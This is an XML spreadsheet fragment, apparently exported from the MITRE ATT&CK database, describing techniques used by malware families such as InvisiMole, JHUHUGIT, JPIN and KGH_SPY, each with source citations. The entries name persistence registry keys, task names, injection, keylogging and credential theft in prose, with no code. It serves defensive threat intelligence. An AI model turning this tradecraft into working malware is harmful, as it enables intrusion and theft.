    <t>[InvisiMole](https://attack.mitre.org/software/S0260) determines a working directory where it stores all the gathered data about the compromised machine.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can deliver trojanized versions of software and documents, relying on user execution.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has attempted to disguise itself by registering under a seemingly legitimate service name.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has disguised its droppers as legitimate software or documents, matching their original names and locations, and saved its files as mpr.dll in the Windows folder.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has a command to create, set, copy, or delete a specified Registry key or value.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can use winapiexec tool for indirect execution of  &lt;code&gt;ShellExecuteW&lt;/code&gt; and &lt;code&gt;CreateProcessA&lt;/code&gt;.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can scan the network for open ports and vulnerable instances of RDP and SMB protocols.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>Network Share Connection Removal</t>
  </si>
  <si>
    <t xml:space="preserve">
[InvisiMole](https://attack.mitre.org/software/S0260) can disconnect previously connected remote drives.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can gather network share information.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has used TCP to download additional modules.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can use a modified base32 encoding to encode data within the subdomain of C2 requests.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) avoids analysis by encrypting all strings, internal files, configuration data and by using a custom executable format.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can inject its backdoor as a portable executable into a target process.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can obtain a list of running processes.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can inject itself into another process to avoid detection including use of a technique called ListPlanting that customizes the sorting algorithm in a ListView structure.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can mimic HTTP protocol with custom HTTP “verbs” HIDE, ZVVP, and NOP.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can enumerate Registry values, keys, and data.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can place a lnk file in the Startup Folder to achieve persistence.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has used rundll32.exe for execution.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has used scheduled tasks named &lt;code&gt;MSST&lt;/code&gt; and &lt;code&gt;\Microsoft\Windows\Autochk\Scheduled&lt;/code&gt; to establish persistence.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can capture screenshots of not only the entire screen, but of each separate window open, in case they are overlapping.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can check for the presence of network sniffers, AV, and BitDefender firewall.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has used Windows services as a way to execute its malicious payload.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can use a .lnk shortcut for the Control Panel to establish persistence.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can collect information about installed software used by specific users, software executed on user login, and software executed by each system.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) uses variations of a simple XOR encryption routine for C&amp;C communications.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can check for artifacts of VirtualBox, Virtual PC and VMware environment, and terminate itself if they are detected.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can gather information on the mapped drives, OS version, computer name, DEP policy, memory size, and system volume serial number.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) gathers information on the IP forwarding table, MAC address, configured proxy, and network SSID.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) lists local users and session information.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can obtain running services on the victim.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) gathers the local system time from the victim’s machine.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can replace legitimate software or documents in the compromised network with their trojanized versions, in an attempt to propagate itself within the network.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) samples were timestomped by the authors by setting the PE timestamps to all zero values. [InvisiMole](https://attack.mitre.org/software/S0260) also has a built-in command to modify file times.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can remotely activate the victim’s webcam to capture content.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) uses HTTP for C2 communications.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can launch a remote shell to execute commands.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can register a Windows service named CsPower as part of its execution chain, and a Windows service named clr_optimization_v2.0.51527_X86 to achieve persistence.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[Invoke-PSImage](https://attack.mitre.org/software/S0231) can be used to embed a PowerShell script within the pixels of a PNG file.(Citation: GitHub Invoke-PSImage)</t>
  </si>
  <si>
    <t>[IronNetInjector](https://attack.mitre.org/software/S0581) has the ability to decrypt embedded .NET and PE payloads.(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>[IronNetInjector](https://attack.mitre.org/software/S0581) has the ability to inject a DLL into running processes, including the [IronNetInjector](https://attack.mitre.org/software/S0581) DLL into explorer.exe.(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>[IronNetInjector](https://attack.mitre.org/software/S0581) has been disguised as a legitimate service using the name PythonUpdateSrvc.(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>[IronNetInjector](https://attack.mitre.org/software/S0581) can obfuscate variable names, encrypt strings, as well as base64 encode and Rijndael encrypt payloads.(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>[IronNetInjector](https://attack.mitre.org/software/S0581) can identify processes via C# methods such as &lt;code&gt;GetProcessesByName&lt;/code&gt; and running [Tasklist](https://attack.mitre.org/software/S0057) with the Python &lt;code&gt;os.popen&lt;/code&gt; function.(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>[IronNetInjector](https://attack.mitre.org/software/S0581) can use an IronPython scripts to load a .NET injector to inject a payload into its own or a remote process.(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>[IronNetInjector](https://attack.mitre.org/software/S0581) can use IronPython scripts to load payloads with the help of a .NET injector.(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>[IronNetInjector](https://attack.mitre.org/software/S0581) has used a task XML file named &lt;code&gt;mssch.xml&lt;/code&gt; to run an IronPython script when a user logs in or when specific system events are created.(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) can collect data from a local system.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) has a command to delete a file from the machine.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) can list file and directory information.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) sets its own executable file's attributes to hidden.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) can download and execute additional files.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) has used registry values and file names associated with Adobe software, such as AcroRd32.exe.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) can list running processes.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) can achieve persistence by adding itself to the &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; Registry key.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) uses custom Base64 encoding schemes to obfuscate command and control traffic in the message body of HTTP requests.(Citation: Moran 2013)(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) collects the computer name of the victim's system during the initial infection.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) enumerates the IP address, network proxy settings, and domain name from a victim's system.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) collects the username from the victim’s machine.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) can list running services.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) uses HTTP for command and control.(Citation: Moran 2013)(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) is capable of executing commands via [cmd](https://attack.mitre.org/software/S0106).(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[JCry](https://attack.mitre.org/software/S0389) has encrypted files and demanded Bitcoin to decrypt those files. (Citation: Carbon Black JCry May 2019)</t>
  </si>
  <si>
    <t>[JCry](https://attack.mitre.org/software/S0389) has been observed deleting shadow copies to ensure that data cannot be restored easily.(Citation: Carbon Black JCry May 2019)</t>
  </si>
  <si>
    <t>[JCry](https://attack.mitre.org/software/S0389) has achieved execution by luring users to click on a file that appeared to be an Adobe Flash Player update installer. (Citation: Carbon Black JCry May 2019)</t>
  </si>
  <si>
    <t>[JCry](https://attack.mitre.org/software/S0389) has used PowerShell to execute payloads.(Citation: Carbon Black JCry May 2019)</t>
  </si>
  <si>
    <t>[JCry](https://attack.mitre.org/software/S0389) has created payloads in the Startup directory to maintain persistence. (Citation: Carbon Black JCry May 2019)</t>
  </si>
  <si>
    <t>[JCry](https://attack.mitre.org/software/S0389) has used VBS scripts. (Citation: Carbon Black JCry May 2019)</t>
  </si>
  <si>
    <t>[JCry](https://attack.mitre.org/software/S0389) has used &lt;code&gt;cmd.exe&lt;/code&gt; to launch PowerShell.(Citation: Carbon Black JCry May 2019)</t>
  </si>
  <si>
    <t>A [JHUHUGIT](https://attack.mitre.org/software/S0044) variant accesses a screenshot saved in the clipboard and converts it to a JPG image.(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) has used COM hijacking to establish persistence by hijacking a class named MMDeviceEnumerator and also by registering the payload as a Shell Icon Overlay handler COM object ({3543619C-D563-43f7-95EA-4DA7E1CC396A}).(Citation: ESET Sednit Part 1)(Citation: Talos Seduploader Oct 2017)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) has exploited CVE-2015-1701 and CVE-2015-2387 to escalate privileges.(Citation: ESET Sednit Part 1)(Citation: ESET Sednit July 2015)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) tests if it can reach its C2 server by first attempting a direct connection, and if it fails, obtaining proxy settings and sending the connection through a proxy, and finally injecting code into a running browser if the proxy method fails.(Citation: ESET Sednit Part 1)</t>
  </si>
  <si>
    <t>The [JHUHUGIT](https://attack.mitre.org/software/S0044) dropper can delete itself from the victim. Another [JHUHUGIT](https://attack.mitre.org/software/S0044) variant has the capability to delete specified files.(Citation: ESET Sednit Part 1)(Citation: Unit 42 Sofacy Feb 2018)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) can retrieve an additional payload from its C2 server.(Citation: ESET Sednit Part 1)(Citation: Unit 42 Sofacy Feb 2018) [JHUHUGIT](https://attack.mitre.org/software/S0044) has a command to download files to the victim’s machine.(Citation: Talos Seduploader Oct 2017)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) has registered a Windows shell script under the Registry key &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt; to establish persistence.(Citation: ESET Sednit Part 1)(Citation: Talos Seduploader Oct 2017)</t>
  </si>
  <si>
    <t>Many strings in [JHUHUGIT](https://attack.mitre.org/software/S0044) are obfuscated with a XOR algorithm.(Citation: F-Secure Sofacy 2015)(Citation: ESET Sednit Part 1)(Citation: Talos Seduploader Oct 2017)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) obtains a list of running processes on the victim.(Citation: ESET Sednit Part 1)(Citation: Unit 42 Sofacy Feb 2018)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) performs code injection injecting its own functions to browser processes.(Citation: F-Secure Sofacy 2015)(Citation: Unit 42 Sofacy Feb 2018)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) has used a Registry Run key to establish persistence by executing JavaScript code within the rundll32.exe process.(Citation: ESET Sednit Part 1)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) is executed using rundll32.exe.(Citation: F-Secure Sofacy 2015)(Citation: Talos Seduploader Oct 2017)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) has registered itself as a scheduled task to run each time the current user logs in.(Citation: ESET Sednit Part 1)(Citation: ESET Sednit July 2015)</t>
  </si>
  <si>
    <t>A [JHUHUGIT](https://attack.mitre.org/software/S0044) variant takes screenshots by simulating the user pressing the "Take Screenshot" key (VK_SCREENSHOT), accessing the screenshot saved in the clipboard, and converting it to a JPG image.(Citation: Unit 42 Playbook Dec 2017)(Citation: Talos Seduploader Oct 2017)</t>
  </si>
  <si>
    <t>A [JHUHUGIT](https://attack.mitre.org/software/S0044) variant encodes C2 POST data base64.(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) obtains a build identifier as well as victim hard drive information from Windows registry key &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum&lt;/code&gt;. Another [JHUHUGIT](https://attack.mitre.org/software/S0044) variant gathers the victim storage volume serial number and the storage device name.(Citation: ESET Sednit Part 1)(Citation: Unit 42 Sofacy Feb 2018)</t>
  </si>
  <si>
    <t>A [JHUHUGIT](https://attack.mitre.org/software/S0044) variant gathers network interface card information.(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) variants have communicated with C2 servers over HTTP and HTTPS.(Citation: ESET Sednit Part 1)(Citation: Unit 42 Sofacy Feb 2018)(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) uses a .bat file to execute a .dll.(Citation: Talos Seduploader Oct 2017)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) has registered itself as a service to establish persistence.(Citation: ESET Sednit Part 1)</t>
  </si>
  <si>
    <t>A [JPIN](https://attack.mitre.org/software/S0201) variant downloads the backdoor payload via the BITS service.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can lower security settings by changing Registry keys.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201)'s installer/uninstaller component deletes itself if it encounters a version of Windows earlier than Windows XP or identifies security-related processes running.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can communicate over FTP.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can enumerate drives and their types. It can also change file permissions using cacls.exe.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can download files and upgrade itself.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) contains a custom keylogger.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can obtain the permissions of the victim user.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can send email over SMTP.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>A [JPIN](https://attack.mitre.org/software/S0201) uses a encrypted and compressed payload that is disguised as a bitmap within the resource section of the installer.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can list running processes.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can inject content into lsass.exe to load a module.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can enumerate Registry keys.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) checks for the presence of certain security-related processes and deletes its installer/uninstaller component if it identifies any of them.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can obtain system information such as OS version and disk space.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can obtain network information, including DNS, IP, and proxies.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can obtain the victim user name.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can list running services.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can use the command-line utility cacls.exe to change file permissions.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[Janicab](https://attack.mitre.org/software/S0163) captured audio and sent it out to a C2 server.(Citation: f-secure janicab)(Citation: Janicab)</t>
  </si>
  <si>
    <t>[Janicab](https://attack.mitre.org/software/S0163) used a valid AppleDeveloperID to sign the code to get past security restrictions.(Citation: Janicab)</t>
  </si>
  <si>
    <t>[Janicab](https://attack.mitre.org/software/S0163) used a cron job for persistence on Mac devices.(Citation: Janicab)</t>
  </si>
  <si>
    <t>[Janicab](https://attack.mitre.org/software/S0163) captured screenshots and sent them out to a C2 server.(Citation: f-secure janicab)(Citation: Janicab)</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) can use large obfuscated libraries to hinder detection and analysis.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) can capture login credentials from open browsers including Firefox, Chrome, Internet Explorer, and Edge.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) can use DLL side-loading to load malicious DLLs into legitimate executables.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) can read C2 information from Google Documents and YouTube.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) can download payloads from remote C2 servers.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) has achieved execution through victims opening malicious attachments, including MSI files with embedded VBScript.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) has achieved execution through victims clicking links to malicious websites.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) has used the MSI installer to download and execute malicious payloads.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) can monitor processes for open browsers and custom banking applications.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) has been delivered as malicious e-mail attachments.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) has been delivered via malicious links embedded in e-mails.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) has used embedded VBScript to download malicious payloads from C2.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[KARAE](https://attack.mitre.org/software/S0215) can use public cloud-based storage providers for command and control.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[KARAE](https://attack.mitre.org/software/S0215) was distributed through torrent file-sharing websites to South Korean victims, using a YouTube video downloader application as a lure.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[KARAE](https://attack.mitre.org/software/S0215) can upload and download files, including second-stage malware.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[KARAE](https://attack.mitre.org/software/S0215) can collect system information.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) has the capability to delete files off the victim’s machine.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) has a command to search for files on the victim’s machine.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) can upload files to the victim’s machine and can download additional payloads.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) has a command to create Registry entries for storing data under &lt;code&gt;HKEY_CURRENT_USER\SOFTWARE\Microsoft\WABE\DataPath&lt;/code&gt;.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) can obtain a list of running processes on the system.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) can capture screenshots of the victim’s machine.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) uses a customized XOR algorithm to encrypt C2 communications.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) has the capability to collect the computer name, language settings, the OS version, CPU information, disk devices, and time elapsed since system start.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) gathers the MAC address of the victim’s machine.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) can execute shell commands using cmd.exe.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can collect credentials from WINSCP.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) has the ability to steal data from the Chrome, Edge, Firefox, Thunderbird, and Opera browsers.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can send a file containing victim system information to C2.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can decrypt encrypted strings and write them to a newly created folder.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can exfiltrate collected information from the host to the C2 server.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can enumerate files and directories on a compromised host.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) has the ability to download and execute code from remote servers.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can perform keylogging by polling the &lt;code&gt;GetAsyncKeyState()&lt;/code&gt; function.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can save collected system information to a file named "info" before exfiltration.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can harvest data from mail clients.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) has the ability to set the &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt; Registry key to execute logon scripts.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) has been spread through Word documents containing malicious macros.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) has masqueraded as a legitimate Windows tool.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) has used encrypted strings in its installer.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can execute PowerShell commands on the victim's machine.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can collect information on installed applications.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can collect drive information from a compromised host.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can send data to C2 with HTTP POST requests.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) has the ability to set a Registry key to run a cmd.exe command.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>Windows Credential Manager</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can collect credentials from the Windows Credential Manager.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KOMPROGO](https://attack.mitre.org/software/S0156) is capable of retrieving information about the infected system.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[KOMPROGO](https://attack.mitre.org/software/S0156) is capable of creating a reverse shell.(Citation: FireEye APT32 May 2017)</t>
  </si>
